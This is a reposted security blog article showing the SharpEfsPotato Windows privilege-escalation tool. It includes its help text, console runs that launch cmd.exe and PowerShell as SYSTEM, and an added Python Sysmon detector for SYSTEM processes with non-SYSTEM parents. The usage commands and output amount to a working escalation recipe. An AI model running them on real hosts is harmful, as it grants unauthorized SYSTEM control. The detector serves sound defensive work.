Privilege Escalation - SharpEfsPotato

admin, 2022-10-30 00:31:44


Usage

C:\temp>SharpEfsPotato.exe -h
SharpEfsPotato by @bugch3ck
  Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
  Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
  -p, --prog=VALUE           Program to launch (default cmd.exe)
  -a, --args=VALUE           Arguments for program (default null)
  -h, --help                 Display this help


Default behavior: launch cmd.exe as SYSTEM in a separate process (in a separate console).

C:\temp>SharpEfsPotato.exe
SharpEfsPotato by @bugch3ck
  Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
  Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
[+] Triggering name pipe access on evil PIPE \localhost/pipe/44259a4a-cbea-499b-9dc5-a9b1c13a4b9f/44259a4a-cbea-499b-9dc5-a9b1c13a4b9f44259a4a-cbea-499b-9dc5-a9b1c13a4b9f
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!


Specifying the PowerShell binary and arguments

C:\temp>SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
SharpEfsPotato by @bugch3ck
  Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
  Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
[+] Triggering name pipe access on evil PIPE \localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/c56e1f1f-f91c-4435-85df-6e158f68acd2c56e1f1f-f91c-4435-85df-6e158f68acd2
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!
C:\temp>type C:\temp\w.log
nt authority\system
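
A defender-side check for the behaviour shown above, added here as an example and not part of the original post or the SharpEfsPotato project: it flags process-creation events where the child runs as SYSTEM but the parent does not. It assumes Sysmon Event ID 1 records exported as JSON lines with the User and ParentUser fields (older Sysmon versions do not log ParentUser) and English account names; the sample records, including the IIS app-pool account and the renamed.exe and old-agent.exe paths, are constructed.

```python
import json

# Assumption: English account names; localized Windows builds spell this differently.
SYSTEM = "NT AUTHORITY\\SYSTEM"

# Constructed Sysmon Event ID 1 (process creation) records, one JSON object per line.
SAMPLE_EVENTS = r'''
{"EventID": 1, "Image": "C:\\Windows\\System32\\svchost.exe", "User": "NT AUTHORITY\\SYSTEM", "ParentImage": "C:\\Windows\\System32\\services.exe", "ParentUser": "NT AUTHORITY\\SYSTEM"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe", "User": "LAB\\alice", "ParentImage": "C:\\Windows\\explorer.exe", "ParentUser": "LAB\\alice"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "User": "NT AUTHORITY\\SYSTEM", "ParentImage": "C:\\temp\\SharpEfsPotato.exe", "ParentUser": "IIS APPPOOL\\DefaultAppPool"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "User": "nt authority\\system", "ParentImage": "C:\\temp\\renamed.exe", "ParentUser": "NT AUTHORITY\\NETWORK SERVICE"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "User": "NT AUTHORITY\\SYSTEM", "ParentImage": "C:\\temp\\old-agent.exe"}
{"EventID": 3, "Image": "C:\\Windows\\System32\\svchost.exe", "User": "NT AUTHORITY\\SYSTEM"}
'''


def is_system(user):
    """Case-insensitive match on the SYSTEM account name."""
    return (user or "").strip().upper() == SYSTEM


def find_escalations(json_lines):
    """Return (hits, skipped): SYSTEM children of non-SYSTEM parents, and the
    number of SYSTEM process creations that could not be judged (no ParentUser)."""
    hits, skipped = [], 0
    for line in json_lines.splitlines():
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        if event.get("EventID") != 1 or not is_system(event.get("User")):
            continue  # only process creations that run as SYSTEM matter here
        parent_user = event.get("ParentUser")
        if not parent_user:
            skipped += 1  # field missing: report it rather than guess
        elif not is_system(parent_user):
            hits.append(event)  # the name-independent signal; binaries get renamed
    return hits, skipped


if __name__ == "__main__":
    found, undecided = find_escalations(SAMPLE_EVENTS)
    for ev in found:
        print(f"ALERT {ev['ParentUser']} -> SYSTEM: {ev['ParentImage']} spawned {ev['Image']}")
    print(f"{undecided} SYSTEM process creation(s) lacked ParentUser")
```

The check keys on the user transition rather than the binary name, so it still fires for the renamed parent in the fourth record.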


Project URL

https://github.com/bugch3ck/SharpEfsPotato


Originally published on the WeChat official account Khan安全攻防实验室: Privilege Escalation - SharpEfsPotato

Source: CN-SEC中文网, http://cn-sec.com/archives/1358179.html
